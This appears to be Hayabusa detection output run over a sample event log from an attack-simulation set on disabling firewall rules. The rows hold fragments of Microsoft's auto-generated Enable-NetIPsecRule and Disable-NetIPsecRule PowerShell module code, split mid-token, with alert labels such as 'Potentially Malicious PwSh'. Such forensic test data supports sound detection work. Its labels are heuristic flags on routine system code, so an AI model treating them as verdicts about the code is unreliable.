[ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 
+09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
